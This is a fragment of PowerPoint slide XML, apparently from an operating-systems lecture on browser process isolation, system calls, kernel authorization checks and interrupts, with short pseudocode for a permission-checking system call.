              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Edge/Firefox/...)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1 Navigation Tab  =  1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>separate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Process </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                                      (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>interpreter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743A0-821E-0172-B520-605527475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891" y="2509837"/>
            <a:ext cx="6172191" cy="3868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CD336-4338-A100-EAF9-1704CFBD2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64" y="3314674"/>
            <a:ext cx="5448772" cy="5906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91D686-6B4D-849E-8CE7-A0C1556677E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5519738" y="3609974"/>
            <a:ext cx="538162" cy="8763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CB2BB4-20CF-EAD5-D947-4072143C1CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4300538" y="3609974"/>
            <a:ext cx="1795462" cy="1062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5B2808-CEC0-72B2-D912-1E455003EC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114676" y="3609973"/>
            <a:ext cx="2981324" cy="12287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7547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F4146-63A1-D96D-20FD-99F41CCA2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C477-23AC-E1D1-941B-82A3875CD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486"/>
            <a:ext cx="10515600" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Process Isolation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> for "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> User"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788BB6-8569-F892-A27A-9D70F5D3CAFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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82EB89-B00D-CE29-A79F-5BC0BC3DF3A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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5CE6E80-C4FA-E6BD-0284-C845433B34E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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A7491C-B796-C300-A464-57ECC95AF225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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5680DB-EDC3-FCC5-04B6-D6D1C1E8184A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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C8197-F830-5EBC-B76A-8BFDE9143AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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793114-275C-2A9D-22E1-6CA13597DE09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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AB7E75-352D-E086-3764-07203C4008BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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FAC7EB-AFF9-EE7E-A3E0-9A109A59B603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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901EFB-12B1-B23F-AB9A-520FDB3B6A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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F7693DCC-BCCA-5E33-951C-EC6705096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1526" y="974669"/>
            <a:ext cx="914400" cy="91440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A748FB9-525C-6397-59C2-2AECFF05EA97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3183942" y="2002172"/>
            <a:ext cx="72956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2ABA4A64-6302-B591-4762-F49F9C7DD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5826" y="970413"/>
            <a:ext cx="914400" cy="91440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78CB71C-E53C-4FB7-A704-7EF7A1F34F2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18528980">
            <a:off x="6240877" y="2070378"/>
            <a:ext cx="72956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732346C-4CE6-F30D-558F-D2BC06E5C1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13822629">
            <a:off x="8818010" y="2134315"/>
            <a:ext cx="72956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247D5254-4178-E6E2-70B1-B8D8544228BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998779" y="2205034"/>
            <a:ext cx="1028700" cy="52387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&quot;Not Allowed&quot; Symbol 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454F9AB8-2690-202C-30DC-F60B50B8D183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143414" y="1827601"/>
            <a:ext cx="709612" cy="65008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4270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AADB1-D6F2-1C1A-C6EF-BDD2A32E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3" y="80963"/>
            <a:ext cx="11691937" cy="1300162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Process -&gt; do System Calls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execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "Kernel" code fragments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4FB8F7-225C-C6CB-1D9B-4AE681383220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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8023D0-D338-8986-5A29-0BF107E97212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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BA2C497-20C6-9314-0858-467076C0A12D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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4B16FA-7AAA-BE15-EDE7-5EF7A0AA4E12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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BD50A5-6896-E018-5749-D0D29A668A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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A277F-F382-DE75-93BA-365C436DFF50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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535F73-05F6-0C1D-5728-F687DF9A4B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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BFCA0C-BEE1-32D1-35E2-A3540556BEB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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270D57-2825-66AC-426B-9DB4B0B66FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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51998B-9217-1D5C-209E-533FC8E50809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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Off-page Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDFF72EA-4502-8E48-98A8-3C7908F9953B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC15F70-F5B8-6301-307B-18887FB4B5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCBFD008-8C59-FCA6-EF42-0E882F12CAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896A68DE-AFF0-7BDE-AD0C-78CD272BD192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841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71B80D1C-12B9-7483-587D-756551C42B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18968235">
            <a:off x="4320161" y="4025218"/>
            <a:ext cx="267734" cy="8803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40F1837-F16B-FC63-894B-AB976280EA6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1961507">
            <a:off x="4904241" y="4093010"/>
            <a:ext cx="267734" cy="7390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212A5433-9BB8-0162-3F20-7D5F6A4CED13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3576530">
            <a:off x="5321626" y="4091489"/>
            <a:ext cx="267734" cy="8803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4D870A-4F24-7B62-FA44-971ED9E75611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3717542" y="5791957"/>
            <a:ext cx="3860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systemCall0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ( param1, param 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>priviledged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> code ... (Kernel Mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>}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7AC104D0-2185-61B9-074A-972A68F23A9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665583" y="5470488"/>
            <a:ext cx="197308" cy="3714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0956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7E1A3-0DB0-423F-CF86-3192F6E33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DE7A0-451F-6C38-DCDC-6747E20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3" y="80963"/>
            <a:ext cx="11691937" cy="1300162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Checks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   has permission on ...) { ..}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C182B2-D0A7-F404-4A4A-465FC8A18B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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514E10-C928-CBA8-4D37-0B577773CF43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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6263D3F-01CC-ADEC-6A44-E4181E761DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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8A208-898B-5E5B-6C9B-FFC274115387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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E058E2-2743-AD89-650D-6997C95B83A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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23FCB4-BB0E-50FC-AF25-F1D1417F5076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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30BB9-7D88-61B2-0240-E2A4CD5A3A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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F44F1-DCD4-C978-961C-0B73F71C47E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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4ECE0F-A2D2-A7BA-12E1-8AF9CC8524C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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6E3B99-1BC8-F208-FED4-855FFBD9B769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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Off-page Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DB2A07-8EA0-FFF5-090D-65F6D9FC617A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CC6AD47-43FF-4553-0580-1AB3625C775F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF33946E-CB17-5ACB-C4D7-23C1B4E40F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{976BECAC-DB76-1501-D591-6395D801CD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841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8AFD42F5-F11D-A0AE-2305-84B2E5F17478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1961507">
            <a:off x="4904241" y="4093010"/>
            <a:ext cx="267734" cy="7390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ECCF40-3C92-324E-1DFD-FCED7627DB1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3654556" y="5476875"/>
            <a:ext cx="68137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systemCall0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (      param1, param 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>     if ( !  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>currentUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>  has permission on ...  ) return E_ACCESS_DENIED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>     if ( ! param1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valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> ) return E_BAD_PARAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>priviledged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> code ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1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CE212-05CC-EE02-458F-B936E52CC6AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300163" y="5747949"/>
            <a:ext cx="205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here</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>currentUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = user2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E5AA6B-6338-41E2-D809-9133871FEBB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5044514" y="2919411"/>
            <a:ext cx="1365763" cy="2885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D45A3A8-DAF0-BAC9-9DFA-10B16444F279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038850" y="2609090"/>
            <a:ext cx="757237" cy="283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36039B-9033-DDCB-EC4E-AA697151AB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467222" y="5804885"/>
            <a:ext cx="3228975" cy="283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14682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C36C3-A368-7859-F489-7D7611934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3ABF8-A3F2-5942-CDFE-48F89206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3" y="80963"/>
            <a:ext cx="11691937" cy="1300162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>forced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) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Interuption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(Kernel can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>interupt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Process to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> code)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D143DAC-976A-84EB-9E1F-B2D4D5E69B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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E55EE1-7361-BFA6-C523-36693678D229}"/>
              </a:ext>
